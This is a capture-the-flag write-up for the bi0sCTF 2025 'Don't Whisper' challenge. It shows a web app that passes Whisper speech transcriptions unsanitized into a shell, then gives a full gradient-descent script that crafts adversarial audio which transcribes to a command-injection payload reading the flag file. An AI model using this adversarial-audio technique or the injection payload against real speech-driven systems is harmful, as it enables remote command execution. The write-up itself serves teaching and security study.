Don't Whisper - bi0sCTF 2025


tl;dr

  • The Whisper model converts audio to text
  • The transcription is passed to a shell subprocess without sanitization
  • Crafting a command injection with your own voice is difficult
  • We need to invert the neural network to find the audio that produces the payload we want
  • Implement gradient-descent-based inversion to find an input for a target output
  • Generate the audio file, send it, and get the flag!

Challenge Points: 991
No. of solves: 5
Challenge Author: w1z

Challenge Description

many say that neural networks are non deterministic and generating mappings between input and output is non TRIVIAL

Challenge Files

Detailed Writeup

We are greeted with a chat app

Chat app interface

Super smart, it is.
Chatbot response

Seems like we can send messages and voice commands (MP3 and WAV files).

Looking at the source given for the web app,
we need to read /chal/flag.

Ignoring the very complex chatbot.py, we look at the FastAPI codebase, app.py.

We see a couple of subprocess calls, but the default value of the shell argument in subprocess.run() is False (read more),
so we won't find anything useful there, and there is a bit of sanitization as well.
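
As a quick illustration (not from the challenge code), an argument list with the default shell=False keeps shell metacharacters in user input as literal text, while a shell string does not:

import subprocess

# shell=False (the default): the whole payload stays one literal argument
subprocess.run(["echo", "hi; cat /chal/flag"])
# prints: hi; cat /chal/flag

# shell=True: the string goes through /bin/sh, so ';' starts a second command
subprocess.run("echo hi; cat /chal/flag", shell=True)
# prints: hi   ...and then runs `cat /chal/flag`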

But there is also this:

result = subprocess.run(
    [
        "python3", "whisper.py", "--model", "tiny.en", audio_file_path,
        "--language", "English", "--best_of", "5", "--beam_size", "None"
    ],
    stdout=subprocess.PIPE,
    stderr=subprocess.PIPE,
    text=True
)

# Check for errors
if result.returncode != 0:
    return JSONResponse(content={"error": "Error processing audio file."}, status_code=500)

transcription = result.stdout.strip()
if not transcription:
    return JSONResponse(content={"error": "No transcription generated."}, status_code=400)

print("Transcription", transcription)
chatbot_proc = await asyncio.create_subprocess_shell(
    f"python3 chatbot.py '{transcription}'",
    stdout=asyncio.subprocess.PIPE,
    stderr=asyncio.subprocess.STDOUT
)
chatbot_stdout, chatbot_stderr = await chatbot_proc.communicate()

So the output of Whisper (the audio-to-text transcription) is passed to asyncio.create_subprocess_shell, which is vulnerable to command injection,
and the transcription is not sanitized either.
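
To see why the payload needs the surrounding single quotes, here is what the f-string above expands to for our target transcription (a quick check, not part of the challenge code):

transcription = "';cat /chal/flag'"
print(f"python3 chatbot.py '{transcription}'")
# python3 chatbot.py '';cat /chal/flag''
# The shell sees `python3 chatbot.py ''` first, then `;` ends that command,
# so `cat /chal/flag ''` runs as a separate command and prints the flag.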

All good!

So we need to send an audio file that transcribes to something like ';cat /chal/flag'.
You'd be crazy to try this by manually recording audio files.

I've tried it myself; it turns out you get pretty far by saying,
There's <silence for 5 sec> cat flag

This would sometimes transcribe as
There's \n cat flag

The newline works as a good proxy for ;
but good luck trying to get it to generate /chal/flag. I was half expecting some madlad to do it (do reach out if you did tho, props!)

I'd thought of making it impossible to do manually (by human voice) by storing the flag as
r3l1y_-0--c0mplx-txt/f41g.txt-y0u-g3t-th3-id3a.txt/0r-m3ybe-not.txt

which would be near impossible to hit manually: Whisper can generate all kinds of symbols, but when you speak them out loud it writes out the words, e.g. “Single quote, semicolon, cat, forward slash chal, forward slash flag.”

From my previous RE experience this looked like a reversing challenge:
you have a function (the NN) and a target output, and you need to see if you can invert the function and figure out which input would generate it. Since the whole function is a white box and we have the model weights locally, this should be possible unless the function is hard to invert, like a hash function.

This type of attack has been done before and is called a model inversion attack.

Looking at the source code for Whisper
and following how it converts the audio to text,

we eventually get to the main transcription loop in decoding.py.
(I did make a few changes compared to the open-source version: I removed beam-search decoding and simplified decoding to greedy argmax, which affects the model's output.)

def _main_loop(self, mel):

    tokenizer: Tokenizer = self.tokenizer
    n_audio = 1
    torch.cuda.empty_cache()
    self.decoder.reset()
    audio_features: Tensor = checkpoint.checkpoint(self._get_audio_features, mel)

    # Initialize tokens for decoding (repeated for each sample in the batch)
    tokens: Tensor = torch.tensor([self.initial_tokens], device=self.model.device).repeat(n_audio, 1)
    sum_logprobs = torch.zeros(tokens.shape[0], device=self.model.device)

    max_len = 12  # max number of tokens allowed

    for i in range(max_len):
        if audio_features.shape[1] == 0:
            raise ValueError("Tokens or audio_features have zero-length dimensions!")

        logits = self.inference.logits(tokens, audio_features)
        logits = logits[:, -1]  # focus on the last token's logits

        # Use argmax for token selection (for inference and next step)
        next_tokens = logits.argmax(dim=-1, keepdim=True)
        tokens = torch.cat([tokens, next_tokens], dim=-1)

        if next_tokens == self.decoder.eot:
            break

    tokens = tokens[0].tolist()
    return tokens

One good thing about this challenge is that you can solve it just by adding a few lines to this source code.
The approach is gradient descent: run inference a few times, back-propagate, tweak your randomly generated audio, and optimize so that the output gets closer to your target output.

Modifying _main_loop for Model Inversion

To make this challenge super easy to solve, you can modify the _main_loop function in decoding.py to perform gradient descent directly. The idea is to take a random mel spectrogram, run it through the model, compare the output tokens to our target (';cat /chal/flag'), and tweak the input to minimize the difference using backpropagation.

What we changed (a rough sketch follows this list):

  • Made mel a learnable parameter with requires_grad_(True).
  • Added an optimizer (Adam) and loss function (CrossEntropyLoss).
  • Added a target text (';cat /chal/flag') and converted it to tokens.
  • Wrapped the token prediction in a loop (50 iterations) to optimize mel by comparing predicted logits to target tokens.
  • Clamped mel to [-1, 1] to keep it valid.
  • After optimization, ran the original transcription loop to verify the output.
  • Returned both the tokens and the optimized mel spectrogram.
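
Here is a rough sketch of what those changes could look like inside _main_loop. Hedged: the target_text value, the use of the cache-free model.logits/embed_audio instead of self.inference.logits, and the _greedy_decode helper at the end are my own simplifications for illustration; the standalone script further down is the version that matters.

def _main_loop(self, mel):
    tokenizer: Tokenizer = self.tokenizer
    self.decoder.reset()

    # Target payload and its token ids (EOT appended, as in the solve script)
    target_text = "';cat /chal/flag'"
    target_tokens = tokenizer.encode(target_text) + [tokenizer.eot]

    # Make the mel spectrogram a learnable parameter
    mel = mel.detach().clone().requires_grad_(True)
    optimizer = torch.optim.Adam([mel], lr=0.01)
    loss_fn = torch.nn.CrossEntropyLoss()

    for step in range(50):
        tokens = torch.tensor([self.initial_tokens], device=self.model.device)
        for t in target_tokens:
            optimizer.zero_grad()
            audio_features = self.model.embed_audio(mel)
            logits = self.model.logits(tokens, audio_features)[:, -1]
            loss = loss_fn(logits, torch.tensor([t], device=self.model.device))
            loss.backward()
            optimizer.step()
            mel.data.clamp_(-1, 1)
            # teacher-force the target token rather than the argmax prediction
            tokens = torch.cat(
                [tokens, torch.tensor([[t]], device=self.model.device)], dim=-1
            )

    # Verify by greedy-decoding the optimized mel with the original loop
    tokens = self._greedy_decode(mel.detach())  # hypothetical helper wrapping the loop shown earlier
    return tokens, mel.detach()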

You can then convert the optimized mel to audio using torchaudio.transforms.InverseMelScale and save it as adversarial.wav. Run whisper.py with this modified code, and it’ll generate the audio file that transcribes to ';cat /chal/flag'. Upload it to the chat app, and boom, you get the flag!
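
A minimal sketch of that mel-to-audio conversion, assuming Whisper's usual front-end parameters (16 kHz, n_fft=400, hop length 160, 80 mel bins, slaney filterbank) and that the tensor holds the normalized log10 mel produced by log_mel_spectrogram. Griffin-Lim phase reconstruction is my own choice here, and the standalone script below side-steps all of this by optimizing the waveform directly:

import torch
import torchaudio

def mel_to_audio(mel: torch.Tensor, sample_rate: int = 16000) -> torch.Tensor:
    # Undo Whisper's normalization: log_spec = (log10(power) + 4) / 4
    power = 10.0 ** (mel * 4.0 - 4.0)
    # Map 80 mel bins back to a 201-bin linear spectrogram, then reconstruct phase
    inverse_mel = torchaudio.transforms.InverseMelScale(
        n_stft=201, n_mels=80, sample_rate=sample_rate, norm="slaney", mel_scale="slaney"
    )
    griffin_lim = torchaudio.transforms.GriffinLim(n_fft=400, hop_length=160)
    return griffin_lim(inverse_mel(power.float().cpu()))

# e.g. torchaudio.save("adversarial.wav", mel_to_audio(optimized_mel.squeeze(0)).unsqueeze(0), 16000)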

Theory: How and Why This Works

Here’s a quick rundown on what’s happening, with some math to make it clear:

  • Whisper’s Decoding Process: Audio is converted to a log-mel spectrogram $ M \in \mathbb{R}^{1 \times n_{\text{mels}} \times T} $, where $ n_{\text{mels}} = 80 $ and $ T = 3000 $ (frames for 30 seconds). The encoder transforms this into audio features:

$ F = \text{Encoder}(M) $

where $ F \in \mathbb{R}^{1 \times T' \times D} $, with $ T' = 1500 $ the audio context length and $ D $ the feature dimension (384 for tiny.en). The decoder then takes these features and a sequence of tokens $ t_1, t_2, \dots, t_{n-1} $ to predict the next token’s logits:

$ L_n = \text{Decoder}(t_{1:n-1}, F) $

where $ L_n \in \mathbb{R}^{V} $ (with $ V $ as the vocabulary size) is the vector of unnormalized scores over possible tokens, and the next token is chosen via $ t_n = \arg\max(L_n) $. This repeats until the end-of-transcription (EOT) token is produced or the max length (12 tokens) is reached. (A short shape check follows this list.)

  • Model Inversion: We want an audio that transcribes to ';cat /chal/flag'. So, we start with a random audio (a random mel spectrogram), run it through the model, and get predicted tokens. We compare these to the target tokens (from tokenizer.encode("';cat /chal/flag'")) using CrossEntropyLoss. For a target token sequence $ T^* = [t^*_1, t^*_2, \dots, t^*_k] $, we optimize the mel spectrogram $ M $ to minimize:

$ \mathcal{L} = \sum_{n=1}^k \text{CrossEntropy}(L_n, t^*_n) $

where $ L_n $ is the logits for the $ n $-th token. Backpropagation (check this 3Blue1Brown video) tweaks $ M $ to reduce the loss. The clamp function ensures the audio stays within [-1, 1], though it makes the function slightly non-differentiable (but it still works fine).

  • Why Gradient Descent?: Since Whisper is a differentiable model (white-box), we can use gradient descent to optimize the input. It’s like reverse engineering a function: given the output, find the input. The Adam optimizer is great for this because it handles the complex, non-linear nature of neural networks efficiently.
  • Why This Setup?: We target one token at a time in the loop, feeding the correct target token instead of the predicted next_tokens (unlike the original code). This forces the model to optimize toward the exact sequence we want. Removing the if next_tokens == self.decoder.eot: break check during optimization can also make it converge faster by avoiding early termination.
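
Here is the shape check promised above, a standalone sketch using the openai-whisper package; the (1, 1500, 384) encoder output is what tiny.en produces, and the two starting tokens are the same SOT and no-timestamps ids used in the solve script:

import torch
import whisper

model = whisper.load_model("tiny.en")
mel = torch.zeros(1, 80, 3000, device=model.device)            # M: (1, n_mels, T)
feats = model.embed_audio(mel)                                  # F: (1, 1500, 384) for tiny.en
tokens = torch.tensor([[50257, 50362]], device=model.device)    # SOT + no-timestamps
logits = model.logits(tokens, feats)                            # L: (1, 2, vocab_size)
next_token = logits[:, -1].argmax(dim=-1)                       # greedy t_n = argmax(L_n)
print(feats.shape, logits.shape, next_token)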

Why Not Manual Audio?

Manually crafting audio is a pain because Whisper tends to write out spoken symbols as words rather than characters like ' ; /. Complex paths like /chal/f41g.txt or r3l1y_-0--c0mplx-txt/f41g.txt-y0u-g3t-th3-id3a.txt/0r-m3ybe-not.txt make it even worse. The 30-second, 40MB upload limit also constrains what you can do manually. Model inversion automates this, letting us generate precise audio that hits the target transcription.

Full Solution Script

Standalone solution script

import torch
from whisper import load_model
from whisper.audio import log_mel_spectrogram, pad_or_trim
from whisper.tokenizer import get_tokenizer
import torchaudio
from torch import nn

DEVICE = "cuda"
target_text = "';cat /chal/flag'"
model = load_model("tiny.en")
model.eval()
tokenizer = get_tokenizer(
    model.is_multilingual,
    num_languages=model.num_languages,
    language="en",
    task="transcribe",
)
target_tokens = tokenizer.encode(target_text)
target_tokens = target_tokens + [50256]  # Add EOT token

adv = torch.randn(1, 16000*20, device=DEVICE, requires_grad=True)
optimizer = torch.optim.Adam([adv], lr=0.01)
loss_fn = nn.CrossEntropyLoss()

num_iterations = 50
for i in range(num_iterations):
    tokens = torch.tensor([[50257, 50362]], device=DEVICE)  # [SOT, EN]
    total_loss = 0
    for target_token in target_tokens:
        optimizer.zero_grad()
        mel = log_mel_spectrogram(adv, model.dims.n_mels, padding=16000*30)
        mel = pad_or_trim(mel, 3000).to(model.device)
        audio_features = model.embed_audio(mel)
        logits = model.logits(tokens, audio_features)[:, -1]
        loss = loss_fn(logits, torch.tensor([target_token], device=DEVICE))
        total_loss += loss
        loss.backward()
        optimizer.step()
        adv.data = adv.data.clamp(-1, 1)
        assert adv.max() <= 1 and adv.min() >= -1
        tokens = torch.cat([tokens, torch.tensor([[target_token]], device=DEVICE)], dim=1)
    print(f"Iteration {i+1}/{num_iterations}, Loss: {loss.item():.4f}")

torchaudio.save("adversarial.wav", adv.detach().cpu(), 16000)

print("Transcribing generated adversarial audio:")
result = model.transcribe(adv.detach().cpu().squeeze(0))
print(f"Transcription: {result['text']}")

Upload adversarial.wav to the chat app, and it’ll execute cat /chal/flag, giving you the flag.

Flag:

bi0sctf{DiD_Y0u_kn0w_NN_c4n_b3_1nv3rt3d-1729}

Musings and Future Work

Making the target text complicated like /chal/f41g.txt or r3l1y_-0--c0mplx-txt/f41g.txt-y0u-g3t-th3-id3a.txt/0r-m3ybe-not.txt makes it way harder to converge. I wonder if some outputs are impossible given the 30-second, 40MB constraint. If we remove the audio length limit, can we reliably generate audio for any arbitrary text, no matter how random? This feels like a big deal for AI traceability and safety alignment.

Like, if we can prove certain harmful outputs can't be generated (no input exists to produce them), we can functionally explain the model's behavior. Why do we still think LLMs are black boxes? They're just massive, non-linear equations! Research on model inversion attacks shows we can extract inputs from outputs in white-box settings, which is exactly what we're doing here. Other work explores gradient-based inversion for images, which is harder but related.

What if we combine symbolic execution with LLMs? Imagine a trusted LLM that fuzzes for harmful content, checking if any input can trigger bad outputs. Papers discuss symbolic execution for neural networks, suggesting we could constrain LLMs to avoid certain behaviors. If we track functional mappings (input to output) with a constant seed, we could make LLMs more deterministic. This challenge shows neural networks aren’t that fuzzy. You can play around with them.

I got the idea for this challenge from a tweet showing Whisper generating weird subtitles for background noise. I'm thinking of writing a universal library for inverting neural networks efficiently.

Also, could Z3 (the constraint solver) work here? I've never tried it, but it'd be cool to see if it can invert Whisper's token sequence.

The problem, as someone famously said, is that LLMs are too fuzzy and symbolic execution is too constrained. A combination of the two, constrained LLMs with traceable mappings, could be the path to AGI. Can we make a function where no input produces harmful audio? That's the dream for AI safety.

So in short, this challenge was made to show people that AI isn't all non-deterministic and can be played around with. We send the generated audio file, get RCE, and cat the flag. Hope you had fun solving this challenge, do reach out with any questions! Cheers!